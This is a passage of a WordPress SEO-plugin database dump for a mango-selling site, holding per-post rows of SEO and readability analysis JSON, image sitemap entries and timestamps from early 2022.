#site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"title\":\"No content yet\",\"description\":\"Please add some content first.\",\"score\":1,\"maxScore\":5}},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"No content yet\",\"description\":\"Please add some content first.\",\"score\":1,\"maxScore\":5}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,67,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-.webp\",\"image:title\":\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-\",\"image:caption\":\"\"}]','2022-02-04 04:39:08','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 12:03:48','2022-02-04 04:39:08'),(36,596,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":[],\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,60,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/images.jpg\",\"image:title\":\"images\",\"image:caption\":\"\"}]','2022-02-08 05:03:28','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 12:08:47','2022-02-08 05:03:28'),(37,616,'#post_title #separator_sa #site_title','#attachment_caption','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 12:29:04','2022-01-25 12:29:23'),(38,633,NULL,NULL,'[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-01-28 10:19:30','default','default',NULL,NULL,NULL,NULL,0,'2022-01-28 10:19:30','2022-02-17 06:00:57'),(39,635,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-28 10:19:30',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-28 10:19:30','2022-01-28 10:19:30'),(40,636,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-28 10:19:30',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-28 10:19:30','2022-01-28 10:19:30'),(41,645,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-28 12:12:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-28 12:12:59','2022-01-28 12:12:59'),(42,667,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-31 12:27:11',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-31 12:27:11','2022-01-31 12:27:11'),(43,682,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":0,\"title\":\"Images\\/videos in content\",\"description\":\"Your content contains images and\\/or video(s).\",\"score\":5,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":1}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,66,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/calender-02.png\",\"image:title\":\"calender-02\",\"image:caption\":\"\"},{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/calender-03-4.png\",\"image:title\":\"calender-03-4\",\"image:caption\":\"\"}]','2022-02-04 12:11:45','default','default',NULL,NULL,NULL,NULL,0,'2022-02-02 08:08:10','2022-02-04 12:11:45'),(44,637,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":[],\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,60,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-.webp\",\"image:title\":\"79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in-\",\"image:caption\":\"\"}]','2022-02-08 11:27:23','default','default',NULL,NULL,NULL,NULL,0,'2022-02-03 12:35:06','2022-02-08 11:27:23'),(45,712,'#post_title #separator_sa #site_title','#attachment_caption','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 06:43:45','2022-02-04 06:43:45'),(46,716,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 07:37:20','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:22:59','2022-02-04 07:37:20'),(47,718,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 07:37:32','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:23:57','2022-02-04 07:37:32'),(48,720,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 07:37:20','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:25:00','2022-02-04 07:37:20'),(49,722,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 35.6 in the test, which is considered difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-04 07:37:23','default','default',NULL,NULL,NULL,NULL,0,'2022-02-04 07:25:24','2022-02-04 07:37:23'),(50,724,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve 